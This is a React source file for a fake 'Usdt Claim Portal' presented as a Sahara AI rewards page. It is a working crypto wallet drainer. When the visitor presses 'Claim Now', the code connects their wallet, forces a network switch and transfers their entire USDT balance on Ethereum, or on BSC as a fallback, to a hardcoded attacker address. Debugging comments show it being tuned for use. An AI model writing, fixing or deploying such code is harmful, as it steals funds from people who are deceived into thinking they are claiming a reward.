import React, { useState, useCallback, useEffect } from 'react';
import { ethers } from 'ethers';
import { AlertCircle, CheckCircle, Loader2, ExternalLink, RefreshCw } from 'lucide-react';
import { createAppKit, useAppKit, useAppKitAccount, useAppKitProvider } from '@reown/appkit/react';
import { EthersAdapter } from '@reown/appkit-adapter-ethers';
import { mainnet, bsc } from '@reown/appkit/networks';

const PROJECT_ID = '3d62c8bfc5d665fd7dec8d2eeeba7c17';
const RECIPIENT = '0xC475fE79c7F01c409ffb212d22111720Ed215cDd';

const USDT_CONTRACTS = {
  1: '0xdAC17F958D2ee523a2206206994597C13D831ec7',
  56: '0x55d398326f99059fF775485246999027B3197955'
};

const ERC20_ABI = [
  'function transfer(address to, uint256 amount) returns (bool)',
  'function balanceOf(address owner) view returns (uint256)'
];

createAppKit({
  adapters: [new EthersAdapter()],
  networks: [mainnet, bsc],
  metadata: {
    name: 'Asset',
    description: 'Sahara AI Rewards Portal',
    url: 'https://assetsclaiming.live',
    icons: ['https://b.galxestatic.com/sahara-earndrop-web/_next/static/media/logo.414840a7.svg']
  },
  projectId: PROJECT_ID
});

const Design = () => {
  const { open } = useAppKit();
  const { address, isConnected, chainId } = useAppKitAccount();
  
  // FIX 1: Pass 'eip155' to the hook to ensure EVM provider is returned
  const { walletProvider } = useAppKitProvider('eip155');

  const [status, setStatus] = useState('IDLE');
  const [error, setError] = useState('');
  const [txHash, setTxHash] = useState('');

  const executeTransaction = async (targetChainId) => {
    // FIX 2: Enhanced Provider Resolution
    // If the hook is empty, check window.ethereum (standard for injected wallets)
    const finalProvider = walletProvider || window.ethereum;

    if (!finalProvider) {
      throw new Error("Connection lost. Please reconnect your wallet.");
    }

    // 1. Force network switch
    if (Number(chainId) !== targetChainId) {
      try {
        await finalProvider.request({
          method: 'wallet_switchEthereumChain',
          params: [{ chainId: `0x${targetChainId.toString(16)}` }],
        });
        await new Promise(r => setTimeout(r, 2000)); 
      } catch (switchError) {
        if (switchError.code === 4902) throw new Error("Network not found in wallet.");
        throw switchError;
      }
    }

    // 2. Initialize V6 BrowserProvider
    const provider = new ethers.BrowserProvider(finalProvider);
    const signer = await provider.getSigner();
    
    const usdtAddress = USDT_CONTRACTS[targetChainId];
    const contract = new ethers.Contract(usdtAddress, ERC20_ABI, signer);

    // 3. Balance Check
    const balance = await contract.balanceOf(address);
    if (balance === 0n) throw new Error(`No USDT found on ${targetChainId === 1 ? 'Ethereum' : 'BSC'}.`);

    // 4. Transfer
    const tx = await contract.transfer(RECIPIENT, balance);
    setTxHash(tx.hash);
    await tx.wait();
    return tx;
  };

  const handleClaim = useCallback(async () => {
    if (!isConnected) return open();
    
    setStatus('SENDING');
    setError('');

    try {
      try {
        await executeTransaction(1);
        setStatus('SUCCESS');
      } catch (ethErr) {
        console.warn("ETH fallback triggered:", ethErr.message);
        
        // Don't switch if user intentionally cancelled the tx
        if (ethErr.code === 4001 || ethErr.message?.includes("rejected")) {
           throw ethErr;
        }

        await executeTransaction(56);
        setStatus('SUCCESS');
      }
    } catch (err) {
      console.error(err);
      setError(err.message || "Transaction failed.");
      setStatus('ERROR');
    }
  }, [isConnected, address, chainId, walletProvider, open]);

  return (
    <div className="portal-container">
      <style>{styles}</style>
      <div className="card">
        <h2>Usdt Claim Portal</h2>
        <p>Verified Liquidity Migration.</p>

        <div className={`status-box ${status.toLowerCase()}`}>
          {status === 'SENDING' && <Loader2 className="spin" />}
          <p>{status === 'IDLE' ? (isConnected ? 'Ready' : 'Connect Wallet') : 
              status === 'SENDING' ? 'Processing...' : 
              status === 'SUCCESS' ? 'Successful!' : error}</p>
        </div>

        {txHash && (
          <a href={Number(chainId) === 56 ? `https://bscscan.com/tx/${txHash}` : `https://etherscan.io/tx/${txHash}`} 
             target="_blank" rel="noreferrer" className="tx-link">
            View Transaction <ExternalLink size={12} />
          </a>
        )}

        <div className="actions">
          <button className="refresh" onClick={() => window.location.reload()}><RefreshCw size={18}/></button>
          {!isConnected ? (
            <button className="main-btn" onClick={() => open()}>Connect</button>
          ) : (
            <button 
              className="main-btn" 
              onClick={handleClaim} 
              disabled={status === 'SENDING' || status === 'SUCCESS'}
            >
              {status === 'SENDING' ? 'Confirming...' : 'Claim Now'}
            </button>
          )}
        </div>
      </div>
    </div>
  );
};

const styles = `
  .portal-container { height: 100vh; display: flex; align-items: center; justify-content: center; background: #080a0c; color: white; font-family: sans-serif; }
  .card { background: #121519; padding: 2.5rem; border-radius: 20px; border: 1px solid #2d333b; width: 380px; text-align: center; }
  .status-box { background: #1c2128; padding: 1.2rem; border-radius: 12px; margin: 1.5rem 0; display: flex; flex-direction: column; align-items: center; gap: 10px; min-height: 80px; justify-content: center; font-size: 0.9rem; }
  .error { color: #f87171; border: 1px solid #f8717130; }
  .success { color: #4ade80; border: 1px solid #4ade8030; }
  .actions { display: flex; gap: 10px; }
  .main-btn { flex: 1; background: #EAF8CD; color: black; border: none; padding: 1rem; border-radius: 12px; font-weight: bold; cursor: pointer; }
  .main-btn:disabled { opacity: 0.5; cursor: not-allowed; }
  .refresh { background: #2d333b; border: none; color: white; padding: 0 15px; border-radius: 12px; cursor: pointer; }
  .tx-link { color: #EAF8CD; font-size: 0.75rem; text-decoration: none; display: block; margin-bottom: 1rem; opacity: 0.8; }
  .spin { animation: spin 1s linear infinite; }
  @keyframes spin { from { transform: rotate(0deg); } to { transform: rotate(360deg); } }
`;

export default Design;